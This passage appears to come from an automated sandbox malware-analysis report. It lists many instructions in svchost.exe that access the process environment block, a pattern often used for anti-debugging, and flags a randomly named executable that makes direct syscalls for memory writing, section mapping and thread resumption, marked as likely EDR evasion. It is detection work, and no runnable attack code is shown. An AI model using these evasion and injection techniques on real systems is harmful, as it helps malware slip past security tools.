            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD070 mov ecx, dword ptr fs:[00000030h]8_2_036AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03632050 mov eax, dword ptr fs:[00000030h]8_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036D705E mov ebx, dword ptr fs:[00000030h]8_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036D705E mov eax, dword ptr fs:[00000030h]8_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B052 mov eax, dword ptr fs:[00000030h]8_2_0365B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A020 mov eax, dword ptr fs:[00000030h]8_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362C020 mov eax, dword ptr fs:[00000030h]8_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036550E4 mov eax, dword ptr fs:[00000030h]8_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036550E4 mov ecx, dword ptr fs:[00000030h]8_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036380E9 mov eax, dword ptr fs:[00000030h]8_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362C0F0 mov eax, dword ptr fs:[00000030h]8_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036720F0 mov ecx, dword ptr fs:[00000030h]8_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037050D9 mov eax, dword ptr fs:[00000030h]8_2_037050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD0C0 mov eax, dword ptr fs:[00000030h]8_2_036AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD0C0 mov eax, dword ptr fs:[00000030h]8_2_036AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B20DE mov eax, dword ptr fs:[00000030h]8_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036590DB mov eax, dword ptr fs:[00000030h]8_2_036590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F60B8 mov eax, dword ptr fs:[00000030h]8_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F60B8 mov ecx, dword ptr fs:[00000030h]8_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363208A mov eax, dword ptr fs:[00000030h]8_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D08D mov eax, dword ptr fs:[00000030h]8_2_0362D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03635096 mov eax, dword ptr fs:[00000030h]8_2_03635096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D090 mov eax, dword ptr fs:[00000030h]8_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D090 mov eax, dword ptr fs:[00000030h]8_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366909C mov eax, dword ptr fs:[00000030h]8_2_0366909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03638770 mov eax, dword ptr fs:[00000030h]8_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643740 mov eax, dword ptr fs:[00000030h]8_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643740 mov eax, dword ptr fs:[00000030h]8_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643740 mov eax, dword ptr fs:[00000030h]8_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366674D mov esi, dword ptr fs:[00000030h]8_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366674D mov eax, dword ptr fs:[00000030h]8_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366674D mov eax, dword ptr fs:[00000030h]8_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03630750 mov eax, dword ptr fs:[00000030h]8_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672750 mov eax, dword ptr fs:[00000030h]8_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672750 mov eax, dword ptr fs:[00000030h]8_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03703749 mov eax, dword ptr fs:[00000030h]8_2_03703749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B4755 mov eax, dword ptr fs:[00000030h]8_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF72E mov eax, dword ptr fs:[00000030h]8_2_036EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03633720 mov eax, dword ptr fs:[00000030h]8_2_03633720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364F720 mov eax, dword ptr fs:[00000030h]8_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364F720 mov eax, dword ptr fs:[00000030h]8_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364F720 mov eax, dword ptr fs:[00000030h]8_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F972B mov eax, dword ptr fs:[00000030h]8_2_036F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C720 mov eax, dword ptr fs:[00000030h]8_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C720 mov eax, dword ptr fs:[00000030h]8_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629730 mov eax, dword ptr fs:[00000030h]8_2_03629730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629730 mov eax, dword ptr fs:[00000030h]8_2_03629730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03665734 mov eax, dword ptr fs:[00000030h]8_2_03665734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363973A mov eax, dword ptr fs:[00000030h]8_2_0363973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363973A mov eax, dword ptr fs:[00000030h]8_2_0363973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366273C mov eax, dword ptr fs:[00000030h]8_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366273C mov ecx, dword ptr fs:[00000030h]8_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366273C mov eax, dword ptr fs:[00000030h]8_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AC730 mov eax, dword ptr fs:[00000030h]8_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03637703 mov eax, dword ptr fs:[00000030h]8_2_03637703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03635702 mov eax, dword ptr fs:[00000030h]8_2_03635702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03635702 mov eax, dword ptr fs:[00000030h]8_2_03635702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C700 mov eax, dword ptr fs:[00000030h]8_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03630710 mov eax, dword ptr fs:[00000030h]8_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03660710 mov eax, dword ptr fs:[00000030h]8_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366F71F mov eax, dword ptr fs:[00000030h]8_2_0366F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366F71F mov eax, dword ptr fs:[00000030h]8_2_0366F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]8_2_0363D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036527ED mov eax, dword ptr fs:[00000030h]8_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036527ED mov eax, dword ptr fs:[00000030h]8_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036527ED mov eax, dword ptr fs:[00000030h]8_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036347FB mov eax, dword ptr fs:[00000030h]8_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036347FB mov eax, dword ptr fs:[00000030h]8_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363C7C0 mov eax, dword ptr fs:[00000030h]8_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036357C0 mov eax, dword ptr fs:[00000030h]8_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036357C0 mov eax, dword ptr fs:[00000030h]8_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036357C0 mov eax, dword ptr fs:[00000030h]8_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B07C3 mov eax, dword ptr fs:[00000030h]8_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B97A9 mov eax, dword ptr fs:[00000030h]8_2_036B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037037B6 mov eax, dword ptr fs:[00000030h]8_2_037037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036307AF mov eax, dword ptr fs:[00000030h]8_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D7B0 mov eax, dword ptr fs:[00000030h]8_2_0365D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF78A mov eax, dword ptr fs:[00000030h]8_2_036EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F866E mov eax, dword ptr fs:[00000030h]8_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F866E mov eax, dword ptr fs:[00000030h]8_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A660 mov eax, dword ptr fs:[00000030h]8_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A660 mov eax, dword ptr fs:[00000030h]8_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03669660 mov eax, dword ptr fs:[00000030h]8_2_03669660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03669660 mov eax, dword ptr fs:[00000030h]8_2_03669660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03662674 mov eax, dword ptr fs:[00000030h]8_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364C640 mov eax, dword ptr fs:[00000030h]8_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E627 mov eax, dword ptr fs:[00000030h]8_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03666620 mov eax, dword ptr fs:[00000030h]8_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705636 mov eax, dword ptr fs:[00000030h]8_2_03705636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03668620 mov eax, dword ptr fs:[00000030h]8_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363262C mov eax, dword ptr fs:[00000030h]8_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03661607 mov eax, dword ptr fs:[00000030h]8_2_03661607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE609 mov eax, dword ptr fs:[00000030h]8_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366F603 mov eax, dword ptr fs:[00000030h]8_2_0366F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]8_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03633616 mov eax, dword ptr fs:[00000030h]8_2_03633616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03633616 mov eax, dword ptr fs:[00000030h]8_2_03633616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672619 mov eax, dword ptr fs:[00000030h]8_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]8_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]8_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]8_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]8_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]8_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]8_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D6E0 mov eax, dword ptr fs:[00000030h]8_2_0365D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D6E0 mov eax, dword ptr fs:[00000030h]8_2_0365D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036636EF mov eax, dword ptr fs:[00000030h]8_2_036636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE6F2 mov eax, dword ptr fs:[00000030h]8_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE6F2 mov eax, dword ptr fs:[00000030h]8_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE6F2 mov eax, dword ptr fs:[00000030h]8_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE6F2 mov eax, dword ptr fs:[00000030h]8_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B06F1 mov eax, dword ptr fs:[00000030h]8_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B06F1 mov eax, dword ptr fs:[00000030h]8_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036ED6F0 mov eax, dword ptr fs:[00000030h]8_2_036ED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A6C7 mov eax, dword ptr fs:[00000030h]8_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]8_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]8_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]8_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]8_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]8_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]8_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F16CC mov eax, dword ptr fs:[00000030h]8_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F16CC mov eax, dword ptr fs:[00000030h]8_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F16CC mov eax, dword ptr fs:[00000030h]8_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F16CC mov eax, dword ptr fs:[00000030h]8_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF6C7 mov eax, dword ptr fs:[00000030h]8_2_036EF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036616CF mov eax, dword ptr fs:[00000030h]8_2_036616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C6A6 mov eax, dword ptr fs:[00000030h]8_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D6AA mov eax, dword ptr fs:[00000030h]8_2_0362D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D6AA mov eax, dword ptr fs:[00000030h]8_2_0362D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036276B2 mov eax, dword ptr fs:[00000030h]8_2_036276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036276B2 mov eax, dword ptr fs:[00000030h]8_2_036276B2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
